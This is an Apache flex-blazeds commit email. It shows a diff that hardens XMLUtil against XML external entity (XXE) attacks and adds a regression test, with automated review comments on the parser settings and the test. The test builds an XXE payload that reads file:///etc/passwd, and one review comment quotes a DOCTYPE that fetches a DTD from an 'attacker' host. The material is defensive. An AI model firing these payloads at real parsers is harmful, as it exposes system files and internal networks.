Repository: flex-blazeds Updated Branches: refs/heads/develop aa98ccdf0 -> af405aa59
Fix security issue due to local entity resolution issues in DocumentBuilder. Project: http://git-wip-us.apache.org/repos/asf/flex-blazeds/repo Commit: http://git-wip-us.apache.org/repos/asf/flex-blazeds/commit/af405aa5 Tree: http://git-wip-us.apache.org/repos/asf/flex-blazeds/tree/af405aa5 Diff: http://git-wip-us.apache.org/repos/asf/flex-blazeds/diff/af405aa5 Branch: refs/heads/develop Commit: af405aa5974f8441873873ac6400dddc1039778e Parents: aa98ccd Author: Christofer Dutz <[email protected]> Authored: Thu Jul 23 14:18:34 2015 +0200 Committer: Christofer Dutz <[email protected]> Committed: Thu Jul 23 14:18:34 2015 +0200
----------------------------------------------------------------------
.../core/src/flex/messaging/util/XMLUtil.java | 8 +++++
.../BlazeDsXmlProcessingXXEVulnerability.java | 36 ++++++++++++++++++++
2 files changed, 44 insertions(+)
----------------------------------------------------------------------
http://git-wip-us.apache.org/repos/asf/flex-blazeds/blob/af405aa5/modules/core/src/flex/messaging/util/XMLUtil.java
----------------------------------------------------------------------
diff --git a/modules/core/src/flex/messaging/util/XMLUtil.java b/modules/core/src/flex/messaging/util/XMLUtil.java
index d34c344..da3349e 100644
--- a/modules/core/src/flex/messaging/util/XMLUtil.java
+++ b/modules/core/src/flex/messaging/util/XMLUtil.java
@@ -123,6 +123,14 @@ public class XMLUtil
 StringReader reader = new StringReader(xml);
 InputSource input = new InputSource(reader);
 DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
+
+ // Disable local resolution of entities due to security issues
+ // See: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
+ factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
+ factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+ factory.setXIncludeAware(false);
+ factory.setExpandEntityReferences(false);
+
 factory.setNamespaceAware(nameSpaceAware);
 factory.setValidating(false);
 DocumentBuilder builder = factory.newDocumentBuilder();
http://git-wip-us.apache.org/repos/asf/flex-blazeds/blob/af405aa5/modules/testsuite/src/test/java/flex/messaging/securityadvisories/BlazeDsXmlProcessingXXEVulnerability.java
----------------------------------------------------------------------
diff --git a/modules/testsuite/src/test/java/flex/messaging/securityadvisories/BlazeDsXmlProcessingXXEVulnerability.java b/modules/testsuite/src/test/java/flex/messaging/securityadvisories/BlazeDsXmlProcessingXXEVulnerability.java
new file mode 100644
index 0000000..71519dc
--- /dev/null
+++ b/modules/testsuite/src/test/java/flex/messaging/securityadvisories/BlazeDsXmlProcessingXXEVulnerability.java
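Review bot: The added feature block still accepts a DOCTYPE, so a payload such as `<!DOCTYPE foo SYSTEM "http://attacker/x.dtd">` may still cause the parser to fetch the external DTD subset — in Xerces that is governed by the `load-external-dtd` feature rather than by the two entity features set here — which keeps a blind SSRF/out-of-band channel open even though entity content is no longer inlined. If BlazeDS payloads never carry a DTD, the stronger fix is `factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);`; otherwise add `factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);` next to the existing `setFeature` calls. The comment should also name what is actually turned off instead of "local resolution of entities", e.g. `// Harden against XXE: do not resolve external general/parameter entities, external DTDs or XIncludes (see OWASP XXE prevention)`. `setFeature` throws `ParserConfigurationException` when the underlying parser does not recognise a feature; the enclosing method's signature lies outside this hunk, so confirm it declares or handles that exception.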
@@ -0,0 +1,36 @@
+package flex.messaging.securityadvisories;
+
+import com.sun.org.apache.xml.internal.serialize.OutputFormat;
+import com.sun.org.apache.xml.internal.serialize.XMLSerializer;
+import flex.messaging.util.XMLUtil;
+import junit.framework.Assert;
+import junit.framework.TestCase;
+import org.w3c.dom.Document;
+
+import java.io.StringWriter;
+
+/**
+ * Created by christoferdutz on 23.07.15.
+ */
+
+public class BlazeDsXmlProcessingXXEVulnerability extends TestCase {
+
+ public void testVulnerability() throws Exception {
+ StringBuffer xml = new StringBuffer(512);
+ xml.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n");
+ xml.append("<!DOCTYPE foo [\r\n");
+ xml.append("<!ELEMENT foo ANY >\r\n");
+ xml.append("<!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>\r\n");
+ xml.append("<foo>&xxe;</foo>");
+
+ Document data = XMLUtil.stringToDocument(xml.toString());
+
+ OutputFormat format = new OutputFormat(data);
+ StringWriter stringOut = new StringWriter();
+ XMLSerializer serial = new XMLSerializer(stringOut, format);
+ serial.serialize(data);
+
+ Assert.assertTrue(stringOut.toString().contains("&xxe;"));
+ }
+
+}
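Review bot: `Assert.assertTrue(stringOut.toString().contains("&xxe;"))` is a weak oracle: with `setExpandEntityReferences(false)` the serializer will likely write the reference back as `&xxe;` whether or not the parser fetched `/etc/passwd` into the EntityReference node's children, so the test could pass against a still-vulnerable parser; add a negative check such as `Assert.assertFalse(data.getDocumentElement().getTextContent().contains("root:"));`, or point the entity at a temp file containing a unique marker string and assert the marker is absent. The serializer comes from `com.sun.org.apache.xml.internal.serialize`, a JDK-internal package that is not accessible on later JDKs, so a `javax.xml.transform.Transformer` with `DOMSource`/`StreamResult` would keep the test portable. Only the external general-entity vector is exercised; the parameter-entity and XInclude settings from the fix have no test, and a second DOCTYPE using a `%` parameter entity or a `SYSTEM` DTD reference would close that gap. The IDE-generated `Created by …` Javadoc should be replaced with a sentence stating what the test guards, e.g. `Regression test: XMLUtil.stringToDocument must not resolve external entities (XXE).`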
